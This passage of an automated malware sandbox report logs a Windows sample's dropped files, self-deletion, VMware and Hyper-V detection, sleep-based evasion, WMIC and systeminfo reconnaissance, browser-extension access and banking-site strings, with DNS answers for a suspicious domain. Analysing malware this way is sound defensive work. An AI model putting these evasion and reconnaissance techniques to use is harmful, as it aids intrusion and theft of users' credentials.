                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02161386 push edi; retf 7_2_02161391
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02162886 push esp; ret 7_2_02162A2D
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_02162889 push esp; ret 7_2_02162A2D
                  Source: OCYe9qcxiM.exeStatic PE information: section name: .text entropy: 7.489225566155988
                  Source: 4470.exe.2.drStatic PE information: section name: .text entropy: 7.47627388301737
                  Source: hehcrfb.2.drStatic PE information: section name: .text entropy: 7.489225566155988
                  Source: fihcrfb.2.drStatic PE information: section name: .text entropy: 7.47627388301737

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\354F.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4470.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fihcrfbJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hehcrfbJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hehcrfbJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fihcrfbJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\ocye9qcxim.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\hehcrfb:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fihcrfb:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hehcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\fihcrfbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_14-884
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                  Source: C:\Users\user\AppData\Roaming\hehcrfbAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                  Source: C:\Users\user\AppData\Roaming\hehcrfbAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                  Source: C:\Users\user\AppData\Roaming\fihcrfbAPI/Special instruction interceptor: Address: 7FFBCB7AE814
                  Source: C:\Users\user\AppData\Roaming\fihcrfbAPI/Special instruction interceptor: Address: 7FFBCB7AD584
                  Source: hehcrfb, 00000004.00000002.1809416780.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKR
                  Source: 4470.exe, 00000007.00000002.2067639306.00000000006BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00C21016
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 450Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1872Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 613Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1556Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2564Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2121Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3970Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3963
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_9-4475
                  Source: C:\Users\user\AppData\Roaming\fihcrfbEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                  Source: C:\Users\user\AppData\Roaming\hehcrfbEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                  Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 9.8 %
                  Source: C:\Users\user\AppData\Roaming\hehcrfbAPI coverage: 1.0 %
                  Source: C:\Users\user\AppData\Roaming\fihcrfbAPI coverage: 1.0 %
                  Source: C:\Windows\explorer.exe TID: 7568Thread sleep count: 450 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7576Thread sleep count: 1872 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7576Thread sleep time: -187200s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7572Thread sleep count: 613 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7572Thread sleep time: -61300s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7792Thread sleep count: 248 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7800Thread sleep count: 210 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7796Thread sleep count: 246 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8012Thread sleep count: 86 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8016Thread sleep count: 133 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 8020Thread sleep count: 135 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7576Thread sleep count: 1556 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7576Thread sleep time: -155600s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 3684Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 1988Thread sleep count: 2564 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 1988Thread sleep time: -2564000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7080Thread sleep count: 2121 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 7080Thread sleep time: -2121000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 6768Thread sleep count: 3970 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 6768Thread sleep time: -3970000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7272Thread sleep count: 3963 > 30
                  Source: C:\Windows\explorer.exe TID: 7272Thread sleep time: -3963000s >= -30000s
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\OCYe9qcxiM.exeCode function: 0_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h0_2_00418C80
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 4_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h4_2_00418C80
                  Source: C:\Users\user\AppData\Local\Temp\4470.exeCode function: 7_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h7_2_004189C0
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 8_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h8_2_004189C0
                  Source: C:\Users\user\AppData\Roaming\hehcrfbCode function: 33_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h33_2_00418C80
                  Source: C:\Users\user\AppData\Roaming\fihcrfbCode function: 34_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h34_2_004189C0
                  Source: C:\Users\user\AppData\Local\Temp\354F.exeCode function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF780B6FB34
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,11_2_00C32B15
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,11_2_00C31D4A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,11_2_00C33ED9
                  Source: C:\Windows\explorer.exeCode function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,13_2_00D330A8
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00C36512 GetSystemInfo,11_2_00C36512
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: F1A1.tmp.11.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: discord.comVMware20,11696494690f
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                  Source: F1A1.tmp.11.drBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: F1A1.tmp.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fo & echo 1315569602311345261315569602\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71431-70569-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 25/09/2023, 10:34:23\r\nSystem Manufacturer: 9exC3KV3FNmpHlL\r\nSystem Model: wmU5t6Us\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: AMUTX H8F5D, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'913 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'163 MB\r\nVirtual Memory: In Use: 1'028 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: cKXTB\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.8\r\n [02]: fe80::9405:b556:3adf:1ab3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1315569602311345261315569602\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp> Section . . . . . . . : Answer\r\n A (Host) Record . . . : 190.249.193.233\r\n\r\n\r\n Record Name . . . . . : nwgrus.ru\r\n Record Type . . . . . : 1\r\n Time To Live . . . . : 1\r\n Data Length . . . . . : 4\r\n Section . . . . . . . : Answer\r\n A (Host) Record . . . : 189.163.45.204\r\n\r\n\r\n1250100858311345261250100858\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>AYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVenzOODTFtCXukOkIK\SwOkIPcPPAU.exe" ,C:\Program Files (x86)\OFtAYmrmizsszQEZUSJNBzumPLoGLVzsZFQQxVen
                  Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                  Source: F1A1.tmp.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: F1A1.tmp.11.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: F1A1.tmp.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: F1A1.tmp.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000002.3874615260.000001B605D33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                  Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: F1A1.tmp.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: F1A1.tmp.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: F1A1.tmp.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: ROUTE.EXE, 00000026.00000002.3222174402.000002608D199000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                  Source: F1A1.tmp.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                  Source: F1A1.tmp.11.drBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: explorer.exe, 00000002.00000000.1503584934.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: F1A1.tmp.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
